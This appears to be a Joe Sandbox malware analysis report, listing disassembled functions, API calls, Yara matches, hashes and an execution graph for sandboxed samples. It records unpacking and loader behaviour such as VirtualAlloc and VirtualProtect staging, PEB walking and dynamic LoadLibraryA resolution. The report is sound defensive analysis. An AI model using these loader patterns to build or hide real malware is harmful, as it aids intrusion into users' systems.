                                                                                                                                                                                                                                                                                      • String ID: F@
                                                                                                                                                                                                                                                                                      • API String ID: 2118720939-885931407
                                                                                                                                                                                                                                                                                      • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                                      • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                                                                                                                                                                                                      Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                                                                                                                                                                                                                                                        • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Access violation - no RTTI data!, xrefs: 00428D7A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                                                                                                      • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                                                                                                      • API String ID: 2053020834-2158758863
                                                                                                                                                                                                                                                                                      • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                                                                      • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                                                                                                                                                                                                                                                      Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                                                                                                                                                                                                      • String ID: zB$~B
                                                                                                                                                                                                                                                                                      • API String ID: 3275300208-395995950
                                                                                                                                                                                                                                                                                      • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                                                      • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                                                                                                                                                                                                                                      Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                      • String ID: pThreadProxy
                                                                                                                                                                                                                                                                                      • API String ID: 1687795959-3651400591
                                                                                                                                                                                                                                                                                      • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                                                                      • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                                                                                                                                                                                                                                                      Function 024EB0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,024C2AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,024C2AAD,00000000), ref: 024EB187
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 024EB195
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,024C2AAD,00000000), ref: 024EB1F0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                                      • Instruction ID: 889a65bff22dee2e63644321748b22c7b6246e322cde52ba5ac680d0d7812a25
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3941EB31A04216AFEF219F65CC4877FB7A5FF4176AF14416AEC5A5B2A0D7308901CB51
                                                                                                                                                                                                                                                                                      Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0042AF2E
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                                      • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:1.7%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:43.1%
                                                                                                                                                                                                                                                                                      Signature Coverage:16.9%
                                                                                                                                                                                                                                                                                      Total number of Nodes:65
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                      execution_graph 26316 8d85a8 26317 8d85b1 26316->26317 26320 8d8b06 26317->26320 26321 8d8b15 26320->26321 26324 8d92a6 26321->26324 26326 8d92c1 26324->26326 26325 8d92ca CreateToolhelp32Snapshot 26325->26326 26327 8d92e6 Module32First 26325->26327 26326->26325 26326->26327 26328 8d92f5 26327->26328 26330 8d8b05 26327->26330 26331 8d8f65 26328->26331 26332 8d8f90 26331->26332 26333 8d8fd9 26332->26333 26334 8d8fa1 VirtualAlloc 26332->26334 26333->26333 26334->26333 26340 43b068 26341 43b080 26340->26341 26343 43b16e 26341->26343 26346 43a9b0 LdrInitializeThunk 26341->26346 26344 43b23f 26343->26344 26347 43a9b0 LdrInitializeThunk 26343->26347 26346->26343 26347->26344 26348 40b44c 26352 40b45a 26348->26352 26353 40b57c 26348->26353 26349 40b65c 26355 43a950 RtlFreeHeap 26349->26355 26352->26349 26352->26353 26354 43a950 RtlFreeHeap 26352->26354 26354->26349 26355->26353 26356 43aecc 26357 43af00 26356->26357 26357->26357 26358 43af7e 26357->26358 26360 43a9b0 LdrInitializeThunk 26357->26360 26360->26358 26361 408790 26363 40879f 26361->26363 26362 408970 ExitProcess 26363->26362 26364 4087b4 GetCurrentProcessId GetCurrentThreadId 26363->26364 26367 40887a 26363->26367 26365 4087da 26364->26365 26366 4087de SHGetSpecialFolderPathW GetForegroundWindow 26364->26366 26365->26366 26366->26367 26367->26362 26368 438e51 RtlAllocateHeap 26369 43ab91 26370 43ab9a GetForegroundWindow 26369->26370 26371 43abad 26370->26371 26372 438e70 26373 438e83 26372->26373 26374 438e94 26372->26374 26375 438e88 RtlFreeHeap 26373->26375 26375->26374 26376 43b195 26378 43b197 26376->26378 26377 43b23f 26378->26377 26380 43a9b0 LdrInitializeThunk 26378->26380 26380->26377 26381 24a003c 26382 24a0049 26381->26382 26396 24a0e0f SetErrorMode SetErrorMode 26382->26396 26387 24a0265 26388 24a02ce VirtualProtect 26387->26388 26389 24a030b 26388->26389 26390 24a0439 VirtualFree 26389->26390 26394 24a05f4 LoadLibraryA 26390->26394 26395 24a04be 26390->26395 26391 24a04e3 LoadLibraryA 26391->26395 26393 24a08c7 26394->26393 26395->26391 26395->26394 26397 24a0223 26396->26397 26398 24a0d90 26397->26398 26399 24a0dad 26398->26399 26400 24a0dbb GetPEB 26399->26400 26401 24a0238 VirtualAlloc 26399->26401 26400->26401 26401->26387

                                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                                      Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4063528623-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                      • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5
                                                                                                                                                                                                                                                                                      Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 242 43a9b0-43a9e2 LdrInitializeThunk
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                                      Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                                      • Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                                                      • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                                                                      Function 0043B05B Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                                      • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD
                                                                                                                                                                                                                                                                                      Function 024A003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 0 24a003c-24a0047 1 24a0049 0->1 2 24a004c-24a0263 call 24a0a3f call 24a0e0f call 24a0d90 VirtualAlloc 0->2 1->2 17 24a028b-24a0292 2->17 18 24a0265-24a0289 call 24a0a69 2->18 19 24a02a1-24a02b0 17->19 22 24a02ce-24a03c2 VirtualProtect call 24a0cce call 24a0ce7 18->22 19->22 23 24a02b2-24a02cc 19->23 29 24a03d1-24a03e0 22->29 23->19 30 24a0439-24a04b8 VirtualFree 29->30 31 24a03e2-24a0437 call 24a0ce7 29->31 32 24a04be-24a04cd 30->32 33 24a05f4-24a05fe 30->33 31->29 35 24a04d3-24a04dd 32->35 36 24a077f-24a0789 33->36 37 24a0604-24a060d 33->37 35->33 41 24a04e3-24a0505 LoadLibraryA 35->41 39 24a078b-24a07a3 36->39 40 24a07a6-24a07b0 36->40 37->36 42 24a0613-24a0637 37->42 39->40 44 24a086e-24a08be LoadLibraryA 40->44 45 24a07b6-24a07cb 40->45 46 24a0517-24a0520 41->46 47 24a0507-24a0515 41->47 48 24a063e-24a0648 42->48 52 24a08c7-24a08f9 44->52 49 24a07d2-24a07d5 45->49 50 24a0526-24a0547 46->50 47->50 48->36 51 24a064e-24a065a 48->51 53 24a07d7-24a07e0 49->53 54 24a0824-24a0833 49->54 55 24a054d-24a0550 50->55 51->36 56 24a0660-24a066a 51->56 57 24a08fb-24a0901 52->57 58 24a0902-24a091d 52->58 59 24a07e2 53->59 60 24a07e4-24a0822 53->60 64 24a0839-24a083c 54->64 61 24a05e0-24a05ef 55->61 62 24a0556-24a056b 55->62 63 24a067a-24a0689 56->63 57->58 59->54 60->49 61->35 65 24a056f-24a057a 62->65 66 24a056d 62->66 67 24a068f-24a06b2 63->67 68 24a0750-24a077a 63->68 64->44 69 24a083e-24a0847 64->69 71 24a059b-24a05bb 65->71 72 24a057c-24a0599 65->72 66->61 73 24a06ef-24a06fc 67->73 74 24a06b4-24a06ed 67->74 68->48 75 24a084b-24a086c 69->75 76 24a0849 69->76 83 24a05bd-24a05db 71->83 72->83 77 24a074b 73->77 78 24a06fe-24a0748 73->78 74->73 75->64 76->44 77->63 78->77 83->55
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 024A024D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                      • Instruction ID: 47db5edc071913791deb89cbc8230648d4aa3d877f6c379e8469fc357dd10e18
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C526974A01229DFDB64CF58C994BADBBB1BF09304F1480DAE94DAB351DB30AA95CF14
                                                                                                                                                                                                                                                                                      Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 123 43ab0b-43ab1f 124 43ab20-43ab7b 123->124 124->124 125 43ab7d-43abce GetForegroundWindow call 43c7d0 124->125
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                                      • String ID: ilmn
                                                                                                                                                                                                                                                                                      • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                                                                      • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                                      • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286
                                                                                                                                                                                                                                                                                      Function 008D92A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 129 8d92a6-8d92bf 130 8d92c1-8d92c3 129->130 131 8d92ca-8d92d6 CreateToolhelp32Snapshot 130->131 132 8d92c5 130->132 133 8d92d8-8d92de 131->133 134 8d92e6-8d92f3 Module32First 131->134 132->131 133->134 139 8d92e0-8d92e4 133->139 135 8d92fc-8d9304 134->135 136 8d92f5-8d92f6 call 8d8f65 134->136 140 8d92fb 136->140 139->130 139->134 140->135
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008D92CE
                                                                                                                                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 008D92EE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D8000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_8d8000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                      • Instruction ID: 8187c6d0c34c316115fafa50bbaef845031d9c1a793c0e06134d700ebcb97721
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BF06231100715BFD7203BB9988DA6F77E8FF49725F10072AE696D15C0DA70E8454661
                                                                                                                                                                                                                                                                                      Function 024A0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 142 24a0e0f-24a0e24 SetErrorMode * 2 143 24a0e2b-24a0e2c 142->143 144 24a0e26 142->144 144->143
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,024A0223,?,?), ref: 024A0E19
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,024A0223,?,?), ref: 024A0E1E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                                                                                                                      • String ID:
